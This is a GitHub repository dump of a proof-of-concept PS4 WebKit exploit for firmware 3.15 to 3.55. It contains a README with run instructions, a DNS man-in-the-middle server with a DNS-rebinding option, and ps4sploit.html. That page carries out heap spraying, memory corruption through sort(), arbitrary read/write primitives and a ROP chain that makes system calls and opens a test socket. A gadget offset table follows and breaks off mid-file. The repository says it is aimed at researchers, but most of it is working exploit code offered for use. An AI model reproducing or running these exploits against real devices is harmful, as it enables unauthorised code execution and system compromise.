├── README.md
├── dns.conf
├── dumps
    └── .gitkeep
├── fakedns.py
├── ps4sploit.html
├── scripts
    ├── gadgets.js
    ├── jquery.min.js
    ├── js_utils.js
    ├── long.js
    ├── mem_utils.js
    ├── network_utils.js
    └── rop.js
└── server.py


/README.md:
--------------------------------------------------------------------------------
 1 | PS4 3.55 Unsigned Code Execution
 2 | ==============
 3 | This GitHub Repository contains all the necessary tools for getting PoC Unsigned Code Execution on a Sony PS4 System with firmwares 3.15, 3.50 and 3.55. <br />
 4 | This Exploit, is based-off [Henkaku's](https://henkaku.xyz/) WebKit Vulnerability for the Sony's PSVita. <br />
 5 | It includes basic ROP and is able to return to normal execution. <br />
 6 | 
 7 | Pre-Requisites:
 8 | ==============
 9 | 1. A PC
10 |   1. Running Windows, macOS or Linux
11 |   2. A already set up basic server where the PS4 User's Guide launcher will point for loading the payload
12 |   3. [Python](https://www.python.org/downloads/) 2.7.X
13 |     * Python 3.X gives problems, since they included major changes on the syntax and on the libraries in comparison with 2.7
14 | 2. A Sony PlayStation 4
15 |   1. Running the following firmwares:
16 |     * 3.15, 3.50 or 3.55
17 | 3. Internet Connection (PS4 and PC directly wired to the Router is the mostly preferred option)
18 | 
19 | Usage:
20 | ==============
21 | There are two different methods to execute the Exploit, but first let's clarify how we will know which one to use. <br />
22 | If your PlayStation 4 has got an already set-up PlayStation Network Account on it, you should use method 1. <br />
23 | Else, if your PlayStation 4 -NEVER- had a PlayStation Network Account on it, you should use method 2. <br />
24 | Probably you will ask why, it's pretty much easy to explain and understand: <br />
25 | When you buy a PS4, comes unactivated, meaning that nobody has entered SEN Account on it. (Method 2) <br />
26 | Once you use a SEN Account on it, the PS4 becomes an activated console. (Method 1) <br />
27 | This doesn't affect the actual payload, but you should take in mind which method use. <br />
28 | 
29 | Method 1:
30 | ==============
31 | Run this command on the folder you've downloaded this repo: <br />
32 | `python server.py` <br />
33 | All the debug options will be outputted during the Exploit process. <br />
34 | Navigate to your PS4's Web Browser and simply type on the adress bar, your PC's IP Adress. <br />
35 | Wait until the exploit finishes, once it does, PS4 will return to it's normal state. <br />
36 | An example of what will look like found [HERE](https://gist.github.com/Fire30/2e0ea2d73d3a1f6f95d80aea77b75df8). <br />
37 | 
38 | Method 2:
39 | ==============
40 | A dns.conf file which is present on the source, needs to be edited accordingly your local PC's IP Adress. <br />
41 | PlayStation 4's DNS Settings must be changed in order to point the PC's IP Adress where the Exploit is located. <br />
42 | Once you've edited the dns.conf file, simply run the next command on the folder where you downloaded this repo: <br />
43 | `python fakedns.py -c dns.conf` <br />
44 | And then: <br />
45 | `python server.py` <br />
46 | All the debug options will be outputted during the Exploit process. <br />
47 | Once Python part is done, get into your PlayStation 4, navigate to the User's Guide page and wait until exploit finishes out. <br />
48 | An example of what will look like found [HERE](https://gist.github.com/Fire30/2e0ea2d73d3a1f6f95d80aea77b75df8). <br />
49 | 
50 | Miscellaneous:
51 | ==============
52 | If you want to try the socket test, change the IP Address located at the bottom of the ps4sploit.html file with your computer's one and run this command: <br />
53 | `netcat -l 0.0.0.0 8989 -v`  <br />
54 | You should see something like: <br />
55 | ```
56 | Listening on [0.0.0.0] (family 0, port 8989)
57 | Connection from [192.168.1.72] port 8989 [tcp/sunwebadmins] accepted (family 2, sport 59389)
58 | Hello From a PS4!
59 | ```
60 | Notes about this exploit:
61 | ==============
62 | * Currently, the exploit does not work 100%, but is around 80% which is fine for our purposes. <br />
63 | * Although it is confirmed to work, sometimes will fail, just wait some seconds and re-run the payload. <br />
64 | * Performing too much memory allocation after sort() is called, can potentially lead to more instability and it may crash more. <br />
65 | * The process will crash after the ROP payload is done executing. <br />
66 | * This is only useful for researchers. There are many many more steps needed before this becomes useful to normal users. <br />
67 | 
68 | Acknowledgements
69 | ================
70 | xyz - Much of the code is based off of his code used for the Henkaku project  
71 | Anonymous contributor - WebKit Vulnerability PoC  
72 | CTurt - I basically copied his JuSt-ROP idea  
73 | xerpi - Used his idea for the socket code  
74 | rck\`d - Finding bugs such as not allocating any space for a stack on function calls  
75 | Maxton - 3.50 support and various cleanup  
76 | Thunder07 - 3.15 support
77 | 
78 | 
79 | Contributing
80 | ================
81 | The code currently is a bit of a mess, so if you have any improvements feel free to send a pull request or make an issue. Also I am perfectly fine if you want to fork and create your own project.
82 | 


--------------------------------------------------------------------------------
/dns.conf:
--------------------------------------------------------------------------------
1 | A manuals.playstation.net 192.168.1.67
2 | 


--------------------------------------------------------------------------------
/dumps/.gitkeep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Fire30/PS4-3.55-Code-Execution-PoC/d79db657b5e54d25f1d7217133a259fe96d8a55a/dumps/.gitkeep


--------------------------------------------------------------------------------
/fakedns.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/python
  2 | """													"""
  3 | """                    Fakedns.py					"""
  4 | """    A regular-expression based DNS MITM Server	"""
  5 | """						by: Crypt0s					"""
  6 | 
  7 | import pdb
  8 | import threading
  9 | import time
 10 | import socket
 11 | import re
 12 | import sys
 13 | import os
 14 | import SocketServer
 15 | import signal
 16 | import argparse
 17 | 
 18 | # inspired from DNSChef
 19 | 
 20 | 
 21 | class ThreadedUDPServer(SocketServer.ThreadingMixIn, SocketServer.UDPServer):
 22 | 
 23 |     def __init__(self, server_address, RequestHandlerClass):
 24 |         self.address_family = socket.AF_INET
 25 |         SocketServer.UDPServer.__init__(
 26 |             self, server_address, RequestHandlerClass)
 27 | 
 28 | 
 29 | class UDPHandler(SocketServer.BaseRequestHandler):
 30 | 
 31 |     def handle(self):
 32 |         (data, s) = self.request
 33 |         respond(data, self.client_address, s)
 34 | 
 35 | 
 36 | class DNSQuery:
 37 | 
 38 |     def __init__(self, data):
 39 |         self.data = data
 40 |         self.dominio = ''
 41 |         tipo = (ord(data[2]) >> 3) & 15   # Opcode bits
 42 |         if tipo == 0:                     # Standard query
 43 |             ini = 12
 44 |             lon = ord(data[ini])
 45 |             while lon != 0:
 46 |                 self.dominio += data[ini + 1:ini + lon + 1] + '.'
 47 |                 ini += lon + 1  # you can implement CNAME and PTR
 48 |                 lon = ord(data[ini])
 49 |             self.type = data[ini:][1:3]
 50 |         else:
 51 |             self.type = data[-4:-2]
 52 | 
 53 | # Because python doesn't have native ENUM in 2.7:
 54 | TYPE = {
 55 |     "\x00\x01": "A",
 56 |     "\x00\x1c": "AAAA",
 57 |     "\x00\x05": "CNAME",
 58 |     "\x00\x0c": "PTR",
 59 |     "\x00\x10": "TXT",
 60 |     "\x00\x0f": "MX"
 61 | }
 62 | 
 63 | # Stolen:
 64 | # https://github.com/learningequality/ka-lite/blob/master/python-packages/django/utils/ipv6.py#L209
 65 | 
 66 | 
 67 | def _is_shorthand_ip(ip_str):
 68 |     """Determine if the address is shortened.
 69 |     Args:
 70 |         ip_str: A string, the IPv6 address.
 71 |     Returns:
 72 |         A boolean, True if the address is shortened.
 73 |     """
 74 |     if ip_str.count('::') == 1:
 75 |         return True
 76 |     if any(len(x) < 4 for x in ip_str.split(':')):
 77 |         return True
 78 |     return False
 79 | 
 80 | # Stolen:
 81 | # https://github.com/learningequality/ka-lite/blob/master/python-packages/django/utils/ipv6.py#L209
 82 | 
 83 | 
 84 | def _explode_shorthand_ip_string(ip_str):
 85 |     """
 86 |     Expand a shortened IPv6 address.
 87 |     Args:
 88 |         ip_str: A string, the IPv6 address.
 89 |     Returns:
 90 |         A string, the expanded IPv6 address.
 91 |     """
 92 |     if not _is_shorthand_ip(ip_str):
 93 |         # We've already got a longhand ip_str.
 94 |         return ip_str
 95 | 
 96 |     new_ip = []
 97 |     hextet = ip_str.split('::')
 98 | 
 99 |     # If there is a ::, we need to expand it with zeroes
100 |     # to get to 8 hextets - unless there is a dot in the last hextet,
101 |     # meaning we're doing v4-mapping
102 |     if '.' in ip_str.split(':')[-1]:
103 |         fill_to = 7
104 |     else:
105 |         fill_to = 8
106 | 
107 |     if len(hextet) > 1:
108 |         sep = len(hextet[0].split(':')) + len(hextet[1].split(':'))
109 |         new_ip = hextet[0].split(':')
110 | 
111 |         for _ in xrange(fill_to - sep):
112 |             new_ip.append('0000')
113 |         new_ip += hextet[1].split(':')
114 | 
115 |     else:
116 |         new_ip = ip_str.split(':')
117 | 
118 |     # Now need to make sure every hextet is 4 lower case characters.
119 |     # If a hextet is < 4 characters, we've got missing leading 0's.
120 |     ret_ip = []
121 |     for hextet in new_ip:
122 |         ret_ip.append(('0' * (4 - len(hextet)) + hextet).lower())
123 |     return ':'.join(ret_ip)
124 | 
125 | 
126 | def _get_question_section(query):
127 |     # Query format is as follows: 12 byte header, question section (comprised
128 |     # of arbitrary-length name, 2 byte type, 2 byte class), followed by an
129 |     # additional section sometimes. (e.g. OPT record for DNSSEC)
130 |     start_idx = 12
131 |     end_idx = start_idx
132 | 
133 |     num_questions = (ord(query.data[4]) << 8) | ord(query.data[5])
134 | 
135 |     while num_questions > 0:
136 |         while query.data[end_idx] != '\0':
137 |             end_idx += ord(query.data[end_idx]) + 1
138 |         # Include the null byte, type, and class
139 |         end_idx += 5
140 |         num_questions -= 1
141 | 
142 |     return query.data[start_idx:end_idx]
143 | 
144 | 
145 | class DNSResponse(object):
146 | 
147 |     def __init__(self, query):
148 |         self.id = query.data[:2]        # Use the ID from the request.
149 |         self.flags = "\x81\x80"         # No errors, we never have those.
150 |         self.questions = query.data[4:6]  # Number of questions asked...
151 |         # Answer RRs (Answer resource records contained in response) 1 for now.
152 |         self.rranswers = "\x00\x01"
153 |         self.rrauthority = "\x00\x00"   # Same but for authority
154 |         self.rradditional = "\x00\x00"  # Same but for additionals.
155 |         # Include the question section
156 |         self.query = _get_question_section(query)
157 |         # The pointer to the resource record - seems to always be this value.
158 |         self.pointer = "\xc0\x0c"
159 |         # This value is set by the subclass and is defined in TYPE dict.
160 |         self.type = None
161 |         self.dnsclass = "\x00\x01"      # "IN" class.
162 |         # TODO: Make this adjustable - 1 is good for noobs/testers
163 |         self.ttl = "\x00\x00\x00\x01"
164 |         # Set by subclass because is variable except in A/AAAA records.
165 |         self.length = None
166 |         self.data = None                # Same as above.
167 | 
168 |     def make_packet(self):
169 |         try:
170 |             self.packet = self.id + self.flags + self.questions + self.rranswers + self.rrauthority + \
171 |                 self.rradditional + self.query + self.pointer + self.type + \
172 |                 self.dnsclass + self.ttl + self.length + self.data
173 |         except:
174 |             pdb.set_trace()
175 |         return self.packet
176 | 
177 | # All classess need to set type, length, and data fields of the DNS Response
178 | # Finished
179 | 
180 | 
181 | class A(DNSResponse):
182 | 
183 |     def __init__(self, query, record):
184 |         super(A, self).__init__(query)
185 |         self.type = "\x00\x01"
186 |         self.length = "\x00\x04"
187 |         self.data = self.get_ip(record, query)
188 | 
189 |     def get_ip(self, dns_record, query):
190 |         ip = dns_record
191 |         # Convert to hex
192 |         return str.join('', map(lambda x: chr(int(x)), ip.split('.')))
193 | 
194 | # Not implemented, need to get ipv6 to translate correctly into hex
195 | 
196 | 
197 | class AAAA(DNSResponse):
198 | 
199 |     def __init__(self, query, address):
200 |         super(AAAA, self).__init__(query)
201 |         self.type = "\x00\x1c"
202 |         self.length = "\x00\x10"
203 |         # Address is already encoded properly for the response at rule-builder
204 |         self.data = address
205 | 
206 |     # Thanks, stackexchange!
207 |     # http://stackoverflow.com/questions/16276913/reliably-get-ipv6-address-in-python
208 |     def get_ip_6(host, port=0):
209 |         # search only for the wanted v6 addresses
210 |         result = socket.getaddrinfo(host, port, socket.AF_INET6)
211 |         # Will need something that looks like this:
212 |         # just returns the first answer and only the address
213 |         ip = result[0][4][0]
214 | 
215 | # Not yet implemented
216 | 
217 | 
218 | class CNAME(DNSResponse):
219 | 
220 |     def __init__(self, query):
221 |         super(CNAME, self).__init__(query)
222 |         self.type = "\x00\x05"
223 | 
224 | # Not yet implemented
225 | 
226 | 
227 | class PTR(DNSResponse):
228 | 
229 |     def __init__(self, query, ptr_entry):
230 |         super(PTR, self).__init__(query)
231 |         self.type = "\x00\x0c"
232 | 
233 |         ptr_split = ptr_entry.split('.')
234 |         ptr_entry = "\x07".join(ptr_split)
235 | 
236 |         self.data = "\x0e" + ptr_entry + "\x00"
237 |         self.data = "\x132-8-8-8\x02lulz\x07com\x00"
238 |         self.length = chr(len(ptr_entry) + 2)
239 |         # Again, must be 2-byte value.
240 |         if self.length < '\xff':
241 |             self.length = "\x00" + self.length
242 | 
243 | # Finished
244 | 
245 | 
246 | class TXT(DNSResponse):
247 | 
248 |     def __init__(self, query, txt_record):
249 |         super(TXT, self).__init__(query)
250 |         self.type = "\x00\x10"
251 |         self.data = txt_record
252 |         self.length = chr(len(txt_record) + 1)
253 |         # Must be two bytes.
254 |         if self.length < '\xff':
255 |             self.length = "\x00" + self.length
256 |         # Then, we have to add the TXT record length field!  We utilize the
257 |         # length field for this since it is already in the right spot
258 |         self.length = self.length + chr(len(txt_record))
259 | 
260 | # And this one is because Python doesn't have Case/Switch
261 | CASE = {
262 |     "\x00\x01": A,
263 |     "\x00\x1c": AAAA,
264 |     "\x00\x05": CNAME,
265 |     "\x00\x0c": PTR,
266 |     "\x00\x10": TXT
267 | }
268 | 
269 | # Technically this is a subclass of A
270 | 
271 | 
272 | class NONEFOUND(DNSResponse):
273 | 
274 |     def __init__(self, query):
275 |         super(NONEFOUND, self).__init__(query)
276 |         self.type = query.type
277 |         self.flags = "\x81\x83"
278 |         self.rranswers = "\x00\x00"
279 |         self.length = "\x00\x00"
280 |         self.data = "\x00"
281 |         print ">> Built NONEFOUND response"
282 | 
283 | 
284 | class ruleEngine:
285 | 
286 |     def __init__(self, file):
287 | 
288 |         # Hackish place to track our DNS rebinding
289 |         self.match_history = {}
290 | 
291 |         self.re_list = []
292 |         print '>>', 'Parse rules...'
293 |         with open(file, 'r') as rulefile:
294 |             rules = rulefile.readlines()
295 |             for rule in rules:
296 |                 splitrule = rule.split()
297 | 
298 |                 # Make sure that the record type is one we currently support
299 |                 # TODO: Straight-up let a user define a custome response type
300 |                 # byte if we don't have one.
301 |                 if splitrule[0] not in TYPE.values():
302 |                     print "Malformed rule : " + rule + " Not Processed."
303 |                     continue
304 | 
305 |                 # We need to do some housekeeping for ipv6 rules and turn them into full addresses if they are shorts.
306 |                 # I could do this at match-time, but i like speed, so I've
307 |                 # decided to keep this in the rule parser and then work on the
308 |                 # logging separate
309 |                 if splitrule[0] == "AAAA":
310 |                     if _is_shorthand_ip(splitrule[2]):
311 |                         splitrule[2] = _explode_shorthand_ip_string(
312 |                             splitrule[2])
313 |                     # OK Now we need to get the ip broken into something that
314 |                     # the DNS response can have in it
315 |                     splitrule[2] = splitrule[2].replace(":", "").decode('hex')
316 |                     # That is what goes into the DNS request.
317 | 
318 |                 # If the ip is 'self' transform it to local ip.
319 |                 if splitrule[2] == 'self':
320 |                     try:
321 |                         ip = socket.gethostbyname(socket.gethostname())
322 |                     except:
323 |                         print ">> Could not get your IP address from your DNS Server."
324 |                         ip = '127.0.0.1'
325 |                     splitrule[2] = ip
326 | 
327 |                 # things after the third element will be dnsrebind args
328 |                 self.re_list.append(
329 |                     [splitrule[0], re.compile(splitrule[1])] + splitrule[2:])
330 | 
331 |                 # TODO: More robust logging system - printing ipv6 rules
332 |                 # requires specialness since I encode the ipv6 addr in-rule
333 |                 if splitrule[0] == "AAAA":
334 |                     print '>>', splitrule[1], '->', splitrule[2].encode('hex')
335 |                 else:
336 |                     print '>>', splitrule[1], '->', splitrule[2]
337 | 
338 |             print '>>', str(len(rules)) + " rules parsed"
339 | 
340 |     # Matching has now been moved into the ruleEngine so that we don't repeat
341 |     # ourselves
342 |     def match(self, query, addr):
343 |         for rule in self.re_list:
344 |             # Match on the domain, then on the query type
345 |             if rule[1].match(query.dominio):
346 |                 if query.type in TYPE.keys() and rule[0] == TYPE[query.type]:
347 |                     # OK, this is a full match, fire away with the correct
348 |                     # response type:
349 | 
350 |                     # Check our DNS Rebinding tracker and see if we need to
351 |                     # respond with the second address now...
352 |                     if args.rebind == True and len(rule) >= 3 and addr in self.match_history.keys():
353 |                         # use second address (rule[3])
354 |                         response_data = rule[3]
355 |                         self.match_history[addr] += 1
356 |                     elif args.rebind == True and len(rule) >= 3:
357 |                         self.match_history[addr] = 1
358 |                         response_data = rule[2]
359 |                     else:
360 |                         response_data = rule[2]
361 | 
362 |                     response = CASE[query.type](query, response_data)
363 |                     print ">> Matched Request - " + query.dominio
364 |                     return response.make_packet()
365 | 
366 |         # OK, we don't have a rule for it, lets see if it exists...
367 |         try:
368 |             # We need to handle the request potentially being a TXT,A,MX,ect... request.
369 |             # So....we make a socket and literally just forward the request raw
370 |             # to our DNS server.
371 |             s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
372 |             s.settimeout(3.0)
373 |             addr = ('8.8.8.8', 53)
374 |             s.sendto(query.data, addr)
375 |             data = s.recv(1024)
376 |             s.close()
377 |             print "Unmatched Request " + query.dominio
378 |             return data
379 |         except:
380 |             # We really shouldn't end up here, but if we do, we want to handle it gracefully and not let down the client.
381 |             # The cool thing about this is that NOTFOUND will take the type straight out of
382 |             # the query object and build the correct query response type from
383 |             # that automagically
384 |             print ">> Error was handled by sending NONEFOUND"
385 |             return NONEFOUND(query).make_packet()
386 | 
387 | # Convenience method for threading.
388 | 
389 | 
390 | def respond(data, addr, s):
391 |     p = DNSQuery(data)
392 |     response = rules.match(p, addr[0])
393 |     s.sendto(response, addr)
394 |     return response
395 | 
396 | 
397 | def signal_handler(signal, frame):
398 |     print 'Exiting...'
399 |     sys.exit(0)
400 | 
401 | if __name__ == '__main__':
402 | 
403 |     parser = argparse.ArgumentParser(description='things and stuff')
404 |     parser.add_argument('-c', dest='path', action='store',
405 |                         help='Path to configuration file', required=True)
406 |     parser.add_argument('-i', dest='iface', action='store',
407 |                         help='IP address you wish to run FakeDns with - default all', default='0.0.0.0', required=False)
408 |     parser.add_argument('--rebind', dest='rebind', action='store_true', required=False, default=False,
409 |                         help="Enable DNS rebinding attacks - responds with one result the first request, and another result on subsequent requests")
410 | 
411 |     args = parser.parse_args()
412 | 
413 |     # Default config file path.
414 |     path = args.path
415 |     if not os.path.isfile(path):
416 |         print '>> Please create a "dns.conf" file or specify a config path: ./fakedns.py [configfile]'
417 |         exit()
418 | 
419 |     rules = ruleEngine(path)
420 |     re_list = rules.re_list
421 | 
422 |     interface = args.iface
423 |     port = 53
424 | 
425 |     try:
426 |         server = ThreadedUDPServer((interface, int(port)), UDPHandler)
427 |     except:
428 |         print ">> Could not start server -- is another program on udp:53?"
429 |         exit(1)
430 | 
431 |     server.daemon = True
432 |     signal.signal(signal.SIGINT, signal_handler)
433 |     server.serve_forever()
434 |     server_thread.join()
435 | 


--------------------------------------------------------------------------------
/ps4sploit.html:
--------------------------------------------------------------------------------
  1 | <script src="/scripts/long.js"></script>
  2 | <script src="/scripts/jquery.min.js"></script>
  3 | <script src="/scripts/js_utils.js"></script>
  4 | <script src="/scripts/network_utils.js"></script>
  5 | <script src="/scripts/mem_utils.js"></script>
  6 | <script src="/scripts/rop.js"></script>
  7 | <script src="/scripts/gadgets.js"></script>
  8 | 
  9 | <script>
 10 |     try {
 11 |         var ua = window.navigator.userAgent;
 12 |         var supportedUAs = Object.getOwnPropertyNames(gadgetMap);
 13 |         for (var i = 0; i < supportedUAs.length; i++)
 14 |             if (ua.indexOf(supportedUAs[i]) != -1) {
 15 |                 gadgets = gadgetMap[supportedUAs[i]];
 16 |             }
 17 |         if (typeof(gadgets) === "undefined") {
 18 |             throw "Your system is not supported.";
 19 |         }
 20 | 
 21 |         var spray = new Array(0x1000)
 22 |         for (var i = 0; i < spray.length; i++) {
 23 |             spray[i] = new Uint32Array(0x1A7)
 24 |         }
 25 | 
 26 |         var almost_oversize = 0x3000;
 27 |         var foo = new Array(almost_oversize);
 28 |         var normal_length = 0x800;
 29 |         var fu = new Array(normal_length);
 30 |         var o = {};
 31 |         var arrays = new Array(0x4);
 32 |         var buf_addr = undefined;
 33 |         var vtable_ptr = undefined;
 34 |         var webkit_base_addr = undefined;
 35 |         var cbuf = undefined;
 36 |         var rop_buf = undefined;
 37 |         var rop_buf_addr = undefined;
 38 |         var storage = new Storage();
 39 |         var found = false;
 40 | 
 41 |         o.toString = function() {
 42 |             foo.push(12345);
 43 |             for (var i = 0; i < arrays.length; ++i) {
 44 |                 var bar = Array.prototype.constructor.apply(null, fu);
 45 |                 bar[0] = 1
 46 |                 bar[1] = 2
 47 |                 bar[2] = 3
 48 |                 arrays[i] = bar;
 49 |             }
 50 |             return "";
 51 |         }
 52 | 
 53 |         foo[0] = o;
 54 | 
 55 |         len = u2d(0x80000000, 0x80000000);
 56 |         for (var i = 1; i < foo.length; ++i) {
 57 |             foo[i] = len
 58 |         }
 59 | 
 60 |         foo.sort();
 61 |         o.toString = function() {};
 62 | 
 63 |         var u32buffer = new Array(0x100)
 64 |         for (var i = 0; i < 0x100; i++) {
 65 |             var v = new Uint32Array(0x13AC)
 66 |             for (var j = 0; j < v.length; j++) {
 67 |                 if (j % 2 == 1)
 68 |                     v[j] = 0x41414141
 69 |                 else
 70 |                     v[j] = j;
 71 |             }
 72 |             u32buffer[i] = v
 73 |         }
 74 | 
 75 |         arr = arrays[1]
 76 | 
 77 |         debug_log("Modified arr length = 0x" + arr.length.toString(16))
 78 |         var start_offset = 0x2F000
 79 |         var offset = d2u(arr[(start_offset) + 0x3000 / 8 + (0x5000 / 8 * -50)]).low
 80 |         var offset2 = d2u(arr[(start_offset) + 0x3000 / 8 + (0x5000 / 8 * 20)]).low
 81 |         var index = 0;
 82 |         for (var i = 48; i < 60; i++) {
 83 |             var val = d2u(arr[(start_offset) + 0x3000 / 8 + (0x5000 / 8 * i) - offset / 2 - 1]).hi
 84 |             if (val == 0xbadaeef7) {
 85 |                 found = true;
 86 |                 debug_log("Found ArrayBufferView in memory!")
 87 |                 debug_log('Modified index is ' + i)
 88 |                 index = i;
 89 |                 break
 90 |             }
 91 |         }
 92 | 
 93 |         if (!found) {
 94 |             throw "Did not find ArrayBufferView in memory.";
 95 |         }
 96 | 
 97 |         // Modify an ArrayBufferView object size,
 98 |         // and make its buffer point to its ArrayBuffer field.
 99 |         arr[(start_offset) + 0x3000 / 8 + (0x5000 / 8 * index) - offset2 / 2 + 7] = u2d(0x80000000, 0xbadbeef7);
100 |         arr[(start_offset) + 0x3000 / 8 + (0x5000 / 8 * index) - offset2 / 2 + 2] = arr[(start_offset) + 0x3000 / 8 + (0x5000 / 8 * index) - offset2 / 2 + 4]
101 | 
102 |         found = false;
103 |         for (var i = 0; i < u32buffer.length; i++) {
104 |             if (u32buffer[i].length != 0x13AC) {
105 |                 // Modify the ArrayBuffer so it is larger
106 |                 // and make it so it's m_data pointer points to the ArrayBufferViews
107 |                 debug_log("Found modified ArrayBufferView!")
108 |                 found = true
109 |                 buf_addr = new dcodeIO.Long(u32buffer[i][2], u32buffer[i][3], true)
110 |                 u32buffer[i][4] = (0x60000 * 4)
111 |                 u32buffer[i][2] = u32buffer[i][6]
112 |                 u32buffer[i][3] = u32buffer[i][7]
113 |                 break;
114 |             }
115 |         }
116 | 
117 |         if (!found) {
118 |             throw "Did not find ArrayBufferView in memory.";
119 |         }
120 | 
121 |         found = false;
122 |         // Find the modified ArrayBuffer and create our own Uint32Array from it
123 |         for (var i = 0; i < u32buffer[i].length; i++) {
124 |             if (u32buffer[i].buffer.byteLength != 0x4eb0) {
125 |                 found = true;
126 |                 debug_log("Found modified ArrayBuffer!")
127 |                 cbuf = new Uint32Array(u32buffer[i].buffer)
128 |                 break;
129 |             }
130 |         }
131 | 
132 |         if (!found) {
133 |             throw "Did not find ArrayBufferView in memory.";
134 |         }
135 | 
136 |         vtable_ptr = new dcodeIO.Long(cbuf[0], cbuf[1], true);
137 |         webkit_base_addr = vtable_ptr.sub(0x2600d80)
138 |             // Change the buffer size of the next ArrayBufferView in memory
139 |         cbuf[0x1e] = 0x600000
140 | 
141 |         found = false;
142 |         // Find it, we will use it for ROP
143 |         for (var i = 0; i < u32buffer[i].length; i++) {
144 |             if (u32buffer[i].length == 0x600000) {
145 |                 found = true;
146 |                 rop_buf = u32buffer[i]
147 |                 break;
148 |             }
149 |         }
150 | 
151 |         if (!found) {
152 |             throw "Did not find ArrayBufferView in memory.";
153 |         }
154 | 
155 |         // Basically the way the memory will be used is:
156 |         // (indexed from start of buffer before modification)
157 |         // (0 - 0x40000) =  used for stack in function calls
158 |         // (0x40000 - (0x80000 - 0x8)) = where actual ROP will be stored
159 |         // ((0x80000 - 0x8) - 0x80000 = where we store old rsp value)
160 |         // (0x80000 - 0xc0000) = data to be stored by the user using the Storage class
161 | 
162 |         rop_buf_addr = new dcodeIO.Long(cbuf[0x14], cbuf[0x15], true)
163 | 
164 |         rop_buf_addr = rop_buf_addr.add(0x10000 * 4)
165 |         cbuf[0x14] = rop_buf_addr.getLowBitsUnsigned()
166 |         cbuf[0x15] = rop_buf_addr.getHighBitsUnsigned()
167 | 
168 |         storage.set_initial_addr(rop_buf_addr.add(0x10000 * 4))
169 | 
170 |         debug_log("vtable = 0x" + vtable_ptr.toString(16))
171 |         debug_log("webkit_base_addr = 0x" + webkit_base_addr.toString(16))
172 |         debug_log("buffer addr = 0x" + rop_buf_addr.toString(16))
173 | 
174 |         debug_log("Starting ROP...")
175 | 
176 |         // to use later
177 |         var libSceSysmodule_base = undefined;
178 | 
179 |         debug_log('Printing module information...')
180 |         var ret = storage.alloc(0x4);
181 |         var count = storage.alloc(0x8);
182 |         var modules = storage.alloc(0x1024);
183 | 
184 |         var r = new RopChain();
185 |         r.syscall(592, modules, 256, count);
186 |         r.add('pop rdi')
187 |         r.add(ret)
188 |         r.add('mov qword ptr [rdi], rax')
189 |         r.execute();
190 |         for (var i = 0; i<256; i++)
191 |         {
192 |             var id = read32(modules.add(i*4)).toString(16);
193 | 
194 |             if (id != 0)
195 |             {
196 |                 var retInfo = storage.alloc(0x4);
197 |                 var info = storage.alloc(0x160);
198 |                 write32(info, 0x160)
199 | 
200 |                 r = new RopChain();
201 |                 r.syscall(593, read32(modules.add(i*4)), info);
202 |                 r.add('pop rdi')
203 |                 r.add(retInfo)
204 |                 r.add('mov qword ptr [rdi], rax')
205 |                 r.execute();
206 |                 if (read32(retInfo) != 0){
207 |                     storage.free(0x160 + 0x4)
208 |                     continue;
209 |                 }
210 |                 var name = read_str(info.add(0x8));
211 |                 var base = read64(info.add(0x42 * 4));
212 |                 var size = read32(info.add(0x44 * 4));
213 | 
214 |                 var data_base = read64(info.add(0x46 * 4));
215 |                 var data_size = read32(info.add(0x48 * 4));
216 | 
217 |                 var something_base = read64(info.add(0x4A * 4));
218 |                 var something_size = read32(info.add(0x4C * 4));
219 |                 debug_log('Module name: ' + name + '\nModule Base: 0x' + base.toString(16) + '\nModule size: 0x' + size.toString(16) +'\nModule Unknown Data Base: 0x' + something_base.toString(16) +'\nModule Unknown Data size: 0x' + something_size.toString(16) +'\nModule Data Base: 0x' + data_base.toString(16) +'\nModule Data size: 0x' + data_size.toString(16))
220 | 
221 |                 debug_log('===============')
222 |                 if (name == "libSceSysmodule.sprx" && libSceSysmodule_base == undefined)
223 |                 {
224 |                     libSceSysmodule_base = base;
225 |                 }
226 | 
227 |                 storage.free(0x160 + 0x4)
228 |                 if (name == "SceLibcInternalHeap") break
229 |             }
230 |         }
231 |         storage.free(0x1024 + 0x8 + 0x4)
232 | 
233 |         // test loading libSceAvSetting.sprx, just like CTurt did
234 |         // sceSysmodule.sprx + 0x20A0 = sceSysmoduleLoadModule();
235 |         // int sceSysmoduleLoadModule(__int64 moduleID, __int64 a2, __int64 a3, _DWORD *a4)
236 |         r = new RopChain();
237 |         r.call(libSceSysmodule_base.add(0x20A0), 11, 0, 0, 0);
238 |         r.execute();
239 |         // you can now dump name again and see libSceAvSetting.sprx
240 | 
241 |         debug_log('Testing sockets...')
242 |         var s = socket()
243 |         debug_log('socket() returned 0x' + s.toString(16))
244 |         var cn = connect_helper(s, '192.168.1.67', 8989)
245 |         debug_log('connect() returned 0x' + cn.toString(16))
246 |         var str_to_write = "Hello From a PS4!\n"
247 |         var addr = storage.alloc(str_to_write.length)
248 |         write_str(addr, str_to_write)
249 |         var bytes_written = write(s, addr, str_to_write.length)
250 |         debug_log('write() returned 0x' + bytes_written.toString(16))
251 |         storage.free(str_to_write.length)
252 | 
253 |         debug_log("DONE!")
254 |     } catch (ex) {
255 |         document.write("<h1>Error: " + ex + "</h1>");
256 |         debug_log("!! ERROR: " + ex);
257 |     }
258 | </script>
259 | 


--------------------------------------------------------------------------------
/scripts/gadgets.js:
--------------------------------------------------------------------------------
 1 | gadgetMap = {
 2 |     'PlayStation 4 3.55': {
 3 |         'xchg rax, rsp; dec dword ptr [rax - 0x77]': new gadget(VTABLE, -0x18a353f),
 4 |         'pop rcx; pop rcx': new gadget(VTABLE, -0x5e970c),
 5 |         'pop rcx': new gadget(VTABLE, -0xab7d4c),
 6 |         'add dword ptr [rax - 0x77], ecx': new gadget(VTABLE, -0x18c3d40),
 7 |         'pop rdi': new gadget(VTABLE, -0x11d1d76),
 8 |         'mov qword ptr [rdi], rax': new gadget(VTABLE, -0x2372c99),
 9 |         'pop rsi': new gadget(VTABLE, -0x88d954),
10 |         'pop rdx': new gadget(VTABLE, -0xac2f8e),
11 |         'pop rax': new gadget(VTABLE, -0x5e9bfd),
12 |         'syscall': new gadget(VTABLE, -0x3dc1a6),
13 |         'pop rsp': new gadget(VTABLE, -0x1abc011),
14 |         'mov rax, qword ptr [rax]': new gadget(VTABLE, -0x238e98d),
15 |         'pop r8': new gadget(VTABLE, -0x15ca007),
16 |         'pop r9': new gadget(VTABLE, -0x17202f1),
17 |     },
18 |     'PlayStation 4 3.50': {
